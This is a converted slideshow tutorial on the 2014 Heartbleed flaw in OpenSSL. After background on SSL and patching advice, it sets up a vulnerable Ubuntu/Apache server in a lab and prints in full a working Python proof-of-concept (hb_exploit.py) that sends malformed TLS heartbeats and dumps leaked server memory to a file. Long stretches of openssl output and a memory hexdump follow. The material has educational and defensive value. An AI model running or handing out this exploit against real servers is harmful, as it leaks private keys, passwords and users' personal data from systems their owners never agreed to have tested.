how to exploit heartbleed vulnerability demonstration

40
::: Demonstration of exploitation of Heartbeat Vulnerability ::: Author: Pankaj Rane Follow me @twitter: https://twitter.com/Panckaz_Rane My blog: www.way2hacker.blogspot.in Before showing demo, let’s go for some explanation about it. Q) What is SSL? SSL stands for Secure Sockets Layer. It is an industry standard technology used for establishing a secure connection between two points, and encrypting the traffic that passes between them. In theory, SSL protects the data passed between a Web server and browser from being accessed or intercepted. Q) What is OpenSSL? OpenSSL is an open-source implementation of the SSL and TLS protocols. The core library, written in the C programming language, implements the basic cryptographic functions and provides various utility functions. Wrappers allowing the use of the OpenSSL library in a variety of computer languages are available. Q) What is “Heartbeat” extension? The Heartbeat Extension provides a new protocol for TLS/DTLS allowing the usage of keep-alive functionality without performing a renegotiation and a basis for path MTU (PMTU) discovery for DTLS. Q) About Heartbeat bug? Millions of websites may have been leaking critically sensitive data for the past two years, thanks to a devastating flaw in the OpenSSL software many sites use to encrypt and transmit data. The Heartbleed bug, as it’s called by the researchers who discovered it, would let anyone on the Internet get into a supposedly secure Web server running certain versions of OpenSSL and scoop up the site’s encryption keys, user passwords and site content. Once an attacker has a website’s encryption keys, anything is fair game: Instead of slipping through a proverbial crack in the wall, he can now walk in and out the front door.

Upload: pankaj-rane

Post on 30-Jun-2015

785 views

Category:

Education


2 download

DESCRIPTION

This document gives a complete overview about heartbleed vulnerability and how to exploit and patch it from being compromised.

TRANSCRIPT

Page 1: How to exploit heartbleed vulnerability demonstration

::: Demonstration of exploitation of Heartbeat Vulnerability :::

Author: Pankaj Rane

Follow me @twitter: https://twitter.com/Panckaz_Rane

My blog: www.way2hacker.blogspot.in

Before showing demo, let’s go for some explanation about it.

Q) What is SSL?

SSL stands for Secure Sockets Layer. It is an industry standard technology used for

establishing a secure connection between two points, and encrypting the traffic that

passes between them. In theory, SSL protects the data passed between a Web server

and browser from being accessed or intercepted.

Q) What is OpenSSL?

OpenSSL is an open-source implementation of the SSL and TLS protocols. The core

library, written in the C programming language, implements the basic cryptographic

functions and provides various utility functions. Wrappers allowing the use of the

OpenSSL library in a variety of computer languages are available.

Q) What is “Heartbeat” extension?

The Heartbeat Extension provides a new protocol for TLS/DTLS allowing the usage of

keep-alive functionality without performing a renegotiation and a basis for path MTU

(PMTU) discovery for DTLS.

Q) About Heartbeat bug?

Millions of websites may have been leaking critically sensitive data for the past two

years, thanks to a devastating flaw in the OpenSSL software many sites use to encrypt

and transmit data.

The Heartbleed bug, as it’s called by the researchers who discovered it, would let

anyone on the Internet get into a supposedly secure Web server running certain

versions of OpenSSL and scoop up the site’s encryption keys, user passwords and site

content.

Once an attacker has a website’s encryption keys, anything is fair game: Instead of

slipping through a proverbial crack in the wall, he can now walk in and out the front

door.

Page 2: How to exploit heartbleed vulnerability demonstration

There have been no documented instances of attacks exploiting the Heartbleed bug. But

because an attack using the bug would leave no trace, and the potential damage from

an attack would be so significant, all websites that ever used the affected versions of

OpenSSL should be considered compromised.

Top sites — including Facebook, Google, Wikipedia, Amazon, Twitter, Apple and

Microsoft — are not currently vulnerable, though some may have been in the past.

Q) How the Hearbleed bug works?

Most secure websites encrypt traffic to and from their servers using a protocol called

SSL/TLS. There are several different encryption “libraries” that can be used in this

protocol, and one of the most widely used is an open-source library called OpenSSL.

The Heartbleed bug is in versions of OpenSSL issued from December 2011 onward, not

in SSL/TLS itself. Not every instance of SSL or TLS encryption across the Internet is

compromised. But OpenSSL is the default encryption library in Apache and Nginx server

software, which power two-thirds of all websites.

An attack exploiting the Heartbleed bug would leave no trace in an attacked Web

server’s logs. It’s impossible to tell how many sites, if any, may have been exploited, and

how many may have been vulnerable over the past two years.

Neel Mehta of Google Security and a team of engineers at Oulu, Finland-based security

company Codenomicon first discovered the Heartbleed bug, though they haven’t

specified when. They’ve created a FAQ page at heartbleed.com with full details.

The bug’s name refers to a handshake (process of connecting to a network) in OpenSSL’s

code called the “heartbeat extension,” which sets a limit on how long an encrypted

session stays valid. A coding error meant that the extension was missing a necessary

verification (called a bounds check), thus giving an attacker access to additional

information about the server and creating the vulnerability.

The most recent version of OpenSSL, 1.0.1g, patches the flaw, so any websites running

OpenSSL should upgrade to the newest version immediately.

Page 3: How to exploit heartbleed vulnerability demonstration

However, the damage has been done. Versions of OpenSSL with the bug have been in

use for more than two years. If an attacker used the Heartbleed bug to get into a Web

server, he would have access to the website’s “crown jewels”: its encryption keys.

With the keys, attackers could decrypt traffic to and from the server; impersonate the

server so that users who think they’re visiting a given website are actually visiting a

fraudulent site disguised as the correct one; or decrypt the server’s databases, including

their users’ personal information, such as usernames, passwords, email addresses,

payment information and more.

Web servers that use or used vulnerable versions of OpenSSL need to do more than

upgrade to the latest version of OpenSSL; they also need to revoke and reissue all of

their encryption certificates. It’s no use boarding up a hole in the wall if the intruders

can now let themselves in through the front door.

Q) Who is Affected?

Administrators of websites using Apache or Nginx server software need to evaluate

whether they have, or had used, vulnerable versions of OpenSSL. Such websites should

be considered compromised.

OpenSSL is also incorporated into email servers using the SMTP, POP and IMAP

protocols; chat servers using the SMPP protocol; and most virtual private networks

(VPNs) that use SSL to protect their networks.

Want to check if an individual Web domain is affected?

Check your domain is safe from heartbleed by typing your domain name in the below

URL.

https://filippo.io/Heartbleed/

What should you do?

Unless you’re a system administrator, there’s not much you can do right now. We can’t

even recommend that you change your online passwords — not yet, at least. If a

website hasn’t upgraded its OpenSSL library and changed its encryption certificates,

then a new password would be just as compromised as an old one.

The vulnerable versions of OpenSSL are 1.0.0 through 1.0.1f. If you’re a website

administrator and can’t upgrade to the newest version, then you can manually disable

the heartbeat function and then recompile OpenSSL’s code.

Page 4: How to exploit heartbleed vulnerability demonstration

Prerequisites:

1. VMware Workstation or Virtual Box.

2. Ubuntu 12.04 ISO

Step 1: I downloaded a Ubuntu 12.04 ISO, which has a default version of OpenSSl of

1.0.1, and which is vulnerable to HeartBleed.

Step 2: Next I’ll install Apache, SSL and accept the default Ubuntu certificate.

Step 3: Run the Ubuntu machine and open the terminal and type the below commands

#sudo apt-get install apache2

#sudo a2enmode ssl

#service apache2 restart

#service apache2 status

#sudo a2ensite default-ssl

#service apache2 reload

#service apache2 restart

This will create a Web server which uses https on Port 443. In the demo I run the

Ubuntu server in VMware Workstation at IP 192.168.61.131.

Step 4: Check your OpenSSL version and other information.

#openssl version –a

OpenSSL 1.0.1 28 Apr 2014

Step 5: Next a Web connection is used to verifiy the connection, after which the

following commands can be used to access the server.

#openssl s_client –connect 192.168.61.131:443 –tlsextdebug

CONNECTED(00000003)

TLS server extension "renegotiation info" (id=65281), len=1

0001 - <SPACES/NULS>

TLS server extension "session ticket" (id=35), len=0

TLS server extension "heartbeat" (id=15), len=1 { Heartbeat Vulnerability }

0000 - 01 .

depth=0 CN = ubuntu

Page 5: How to exploit heartbleed vulnerability demonstration

verify error:num=18:self signed certificate

verify return:1

depth=0 CN = ubuntu

verify return:1

---

Certificate chain

0 s:/CN=ubuntu

i:/CN=ubuntu

---

Server certificate

-----BEGIN CERTIFICATE-----

MIICnjCCAYYCCQDWrFwbrAxohjANBgkqhkiG9w0BAQUFADARMQ8wDQYDVQQDEwZ1

YnVudHUwHhcNMTQwNDI1MTY0NjA2WhcNMjQwNDIyMTY0NjA2WjARMQ8wDQYDVQ

QD

EwZ1YnVudHUwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCgXGIPBKLo

h31pJ4a/uGATJpiK4PyDBdgOofjvnptF6VLsAbYPQ3sLzTBa2KsydYnd31TZDcsX

tOvghN0Ou601+IB5mMj00qQR9gpokKKYz7jioQkHaH0qb41HjPQzTHewpSsJXxsR

rI3jwAYUGtDhlgRU9v21V0G3CprxUmRpF9xIGspw0k88gNa2hfLrQg6AuOSXNuhc

bRKjNu712eDY7TnV1XIBwLd5L38jh87mKoV4UzPVmBUCcCDsqsHl07lQiy0/UGWu

AqwtDbuSLRh5sKSBaIRPJOwvhhQ0sBjr1Z+OvmaSTtAt5L+N0Ta7qBUOTQwEhL5q

iUBeshYCXd73AgMBAAEwDQYJKoZIhvcNAQEFBQADggEBAJmK8K1cW4EoTNMPRD9/

Zcf8llfIIgXPj0ZrsL64EGlIICTX05nUBdNoUaoL+Ivii94flEeI/sr6UvFcc4uC

DITICRn7n87kbF95tLBV+303dfPautUlP19qe7N9XPQW4/nWnkqeRjInbdyKtxNr

r0hHOwHeXnDBBBP1pCn3c1b84Yfc+S+ouNm//CmvlL+ublErlBnqU9Sg+7VoKbHn

NNhCmRK2SyR1K4FsFyGa+gu1Ii7PGDXZOI5hBjLtTe31yf9wZl71iHw+9Uj1h01O

W2g2cpOrRbinTN7lOLg3u9v0RCeqSfjUEBe1tjqxLjn6O7EoJeaan5AdYPPzWBjG

mKY=

-----END CERTIFICATE-----

subject=/CN=ubuntu

issuer=/CN=ubuntu

---

No client certificate CA names sent

---

SSL handshake has read 1573 bytes and written 439 bytes

---

New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA

Server public key is 2048 bit

Secure Renegotiation IS supported

Page 6: How to exploit heartbleed vulnerability demonstration

Compression: NONE

Expansion: NONE

SSL-Session:

Protocol : TLSv1.1

Cipher : DHE-RSA-AES256-SHA

Session-ID:

9206481F74BE3E642870690D7484AD773C3D1265193DE87A2D1353B8D80893E5

Session-ID-ctx:

Master-Key:

D8DA9DDF1019EB7FCB96A978DE628B33D41BA7869385A5B5F55DB537E829D00A902E

ABEAE8C0B30804AC931A6A3E9E54

Key-Arg : None

PSK identity: None

PSK identity hint: None

SRP username: None

TLS session ticket lifetime hint: 300 (seconds)

TLS session ticket:

0000 - fc ae af 70 83 3d 13 5d-01 75 11 9b 25 d6 56 36 ...p.=.].u..%.V6

0010 - 8b cf f5 53 d1 22 3f fd-d9 88 d2 77 21 d1 8b af ...S."?....w!...

0020 - 0e f1 5a 27 99 f9 b4 7f-06 c0 48 cd c9 e5 11 38 ..Z'......H....8

0030 - 34 73 bb c7 40 6a 01 cd-4e d0 2c 76 60 4e 47 75 [email protected].,v`NGu

0040 - 1c 13 29 a8 52 de ae 86-90 5e ce df 83 fc eb 9e ..).R....^......

0050 - 52 2c 5b 8b 02 c6 b3 44-25 64 01 81 1b f3 41 15 R,[....D%d....A.

0060 - e7 5c b1 d4 e4 be ab 63-03 a9 f0 2c 76 d8 79 bb .\.....c...,v.y.

0070 - 67 84 99 50 b0 39 60 0e-69 ac 2e b7 14 3a 10 16 g..P.9`.i....:..

0080 - 44 02 35 19 96 ce 47 9a-18 39 8f 3e e1 6e 2b 47 D.5...G..9.>.n+G

0090 - f1 f7 ca a6 fe 35 69 ed-e6 6b 56 dc 88 f3 48 60 .....5i..kV...H`

00a0 - 3c 39 d2 1a 74 ae f3 62-58 6d 2e 2d ee 30 12 d6 <9..t..bXm.-.0..

00b0 - a5 1e 84 54 71 fe 22 a7-08 7c 81 16 09 9c 67 91 ...Tq."..|....g.

Start Time: 1398683776

Timeout : 300 (sec)

Verify return code: 18 (self signed certificate)

---

Step 6: Copy the below python script in the editor and save it as hb_exploit.py

#!/usr/bin/python

Page 7: How to exploit heartbleed vulnerability demonstration

# Quick and dirty demonstration of CVE-2014-0160 originally by Jared Stafford

([email protected])

# The author disclaims copyright to this source code.

# Modified by SensePost based on lots of other people's efforts (hard to work out credit

via PasteBin)

import sys

import struct

import socket

import time

import select

import re

from optparse import OptionParser

import smtplib

options = OptionParser(usage='%prog server [options]', description='Test for SSL

heartbeat vulne

rability (CVE-2014-0160)')

options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default:

443)')

options.add_option('-n', '--num', type='int', default=1, help='Number of heartbeats to

send if vulne

rable (defines how much memory you get back) (default: 1)')

options.add_option('-f', '--file', type='str', default='dump.bin', help='Filename to write

dumped me

mory too (default: dump.bin)')

options.add_option('-q', '--quiet', default=False, help='Do not display the memory

dump', action='s

tore_true')

options.add_option('-s', '--starttls', action='store_true', default=False, help='Check

STARTTLS (sm

tp only right now)')

def h2bin(x):

return x.replace(' ', '').replace('\n', '').decode('hex')

hello = h2bin('''

16 03 02 00 dc 01 00 00 d8 03 02 53

43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf

bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00

00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88

conve rte d by We b2PDFC onve rt.com

Page 8: How to exploit heartbleed vulnerability demonstration

00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c

c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09

c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44

c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c

c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11

00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04

03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19

00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08

00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13

00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00

00 0f 00 01 01

''')

hbv10 = h2bin('''

18 03 01 00 03

01 40 00

''')

hbv11 = h2bin('''

18 03 02 00 03

01 40 00

''')

hbv12 = h2bin('''

18 03 03 00 03

01 40 00

''')

def hexdump(s, dumpf, quiet):

dump = open(dumpf,'a')

dump.write(s)

dump.close()

if quiet: return

for b in xrange(0, len(s), 16):

lin = [c for c in s[b : b + 16]]

hxdat = ' '.join('%02X' % ord(c) for c in lin)

pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)

print ' %04x: %-48s %s' % (b, hxdat, pdat)

print

def recvall(s, length, timeout=5):

endtime = time.time() + timeout

rdata = ''

Page 9: How to exploit heartbleed vulnerability demonstration

remain = length

while remain > 0:

rtime = endtime - time.time()

if rtime < 0:

if not rdata:

return None

else:

return rdata

r, w, e = select.select([s], [], [], 5)

conve rte d by We b2PDFC onve rt.com

if s in r:

data = s.recv(remain)

# EOF?

if not data:

return None

rdata += data

remain -= len(data)

return rdata

def recvmsg(s):

hdr = recvall(s, 5)

if hdr is None:

print 'Unexpected EOF receiving record header - server closed connection'

return None, None, None

typ, ver, ln = struct.unpack('>BHH', hdr)

pay = recvall(s, ln, 10)

if pay is None:

print 'Unexpected EOF receiving record payload - server closed connection'

return None, None, None

print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))

return typ, ver, pay

def hit_hb(s, dumpf, host, quiet):

while True:

typ, ver, pay = recvmsg(s)

if typ is None:

print 'No heartbeat response received from '+host+', server likely not vulnerable'

return False

if typ == 24:

if not quiet: print 'Received heartbeat response:'

Page 10: How to exploit heartbleed vulnerability demonstration

hexdump(pay, dumpf, quiet)

if len(pay) > 3:

print 'WARNING: server '+ host +' returned more data than it should - server is vulnera

ble!'

else:

print 'Server '+host+' processed malformed heartbeat, but did not return any extra dat

a.'

return True

if typ == 21:

if not quiet: print 'Received alert:'

hexdump(pay, dumpf, quiet)

print 'Server '+ host +' returned error, likely not vulnerable'

return False

def connect(host, port, quiet):

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

if not quiet: print 'Connecting...'

sys.stdout.flush()

s.connect((host, port))

return s

conve rte d by We b2PDFC onve rt.com

def tls(s, quiet):

if not quiet: print 'Sending Client Hello...'

sys.stdout.flush()

s.send(hello)

if not quiet: print 'Waiting for Server Hello...'

sys.stdout.flush()

def parseresp(s):

while True:

typ, ver, pay = recvmsg(s)

if typ == None:

print 'Server closed connection without sending Server Hello.'

return 0

# Look for server hello done message.

if typ == 22 and ord(pay[0]) == 0x0E:

return ver

def check(host, port, dumpf, quiet, starttls):

response = False

if starttls:

Page 11: How to exploit heartbleed vulnerability demonstration

try:

s = smtplib.SMTP(host=host,port=port)

s.ehlo()

s.starttls()

except smtplib.SMTPException:

print 'STARTTLS not supported...'

s.quit()

return False

print 'STARTTLS supported...'

s.quit()

s = connect(host, port, quiet)

s.settimeout(1)

try:

re = s.recv(1024)

s.send('ehlo starttlstest\r\n')

re = s.recv(1024)

s.send('starttls\r\n')

re = s.recv(1024)

except socket.timeout:

print 'Timeout issues, going ahead anyway, but it is probably broken ...'

tls(s,quiet)

else:

s = connect(host, port, quiet)

tls(s,quiet)

version = parseresp(s)

if version == 0:

if not quiet: print "Got an error while parsing the response, bailing ..."

return False

else:

conve rte d by We b2PDFC onve rt.com

version = version - 0x0300

if not quiet: print "Server TLS version was 1.%d\n" % version

if not quiet: print 'Sending heartbeat request...'

sys.stdout.flush()

if (version == 1):

s.send(hbv10)

response = hit_hb(s,dumpf, host, quiet)

if (version == 2):

Page 12: How to exploit heartbleed vulnerability demonstration

s.send(hbv11)

response = hit_hb(s,dumpf, host, quiet)

if (version == 3):

s.send(hbv12)

response = hit_hb(s,dumpf, host, quiet)

s.close()

return response

def main():

opts, args = options.parse_args()

if len(args) < 1:

options.print_help()

return

print 'Scanning ' + args[0] + ' on port ' + str(opts.port)

for i in xrange(0,opts.num):

check(args[0], opts.port, opts.file, opts.quiet, opts.starttls)

if __name__ == '__main__':

main()

Step 7: Next we run the python script hb_exploit.py to capture the running memory

from the server.

#chmod a+x hb_exploit.py

#ls

hb_exploit.py

#python hb_exploit.py 192.168.61.131

Scanning 192.168.61.131 on port 443

Connecting...

Sending Client Hello...

Waiting for Server Hello...

... received message: type = 22, ver = 0302, length = 58

... received message: type = 22, ver = 0302, length = 684

... received message: type = 22, ver = 0302, length = 525

... received message: type = 22, ver = 0302, length = 4

Server TLS version was 1.2

Sending heartbeat request...

... received message: type = 24, ver = 0302, length = 16384

Received heartbeat response:

Page 13: How to exploit heartbleed vulnerability demonstration

0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C [email protected][...r...

0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9.......

0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....".

0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5.

0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................

0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2.

0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../...

0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A...............

0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................

0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.

00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............

00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................

00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................

00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 00 00 00 00 ....#...........

00e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

00f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

01a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

01b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

01c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

01d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

01e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

01f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

Page 14: How to exploit heartbleed vulnerability demonstration

0260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0290: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

02a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

02b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

02c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

02d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

02e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

02f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0310: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0320: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0330: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0340: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

03a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

03b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

03c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

03d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

03e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

03f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0420: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0430: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0440: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0450: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0460: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0470: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0490: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

04a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

04b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

Page 15: How to exploit heartbleed vulnerability demonstration

04c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

04d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

04e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

04f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0510: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0520: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0570: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0590: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

05a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

05b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

05c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

05d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

05e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

05f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0660: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0670: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

06a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

06b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

06c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

06d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

06e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

06f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0710: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

Page 16: How to exploit heartbleed vulnerability demonstration

0720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0730: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

07a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

07b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

07c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

07d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

07e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

07f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0850: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0870: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

08a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

08b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

08c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

08d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

08e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

08f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0920: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

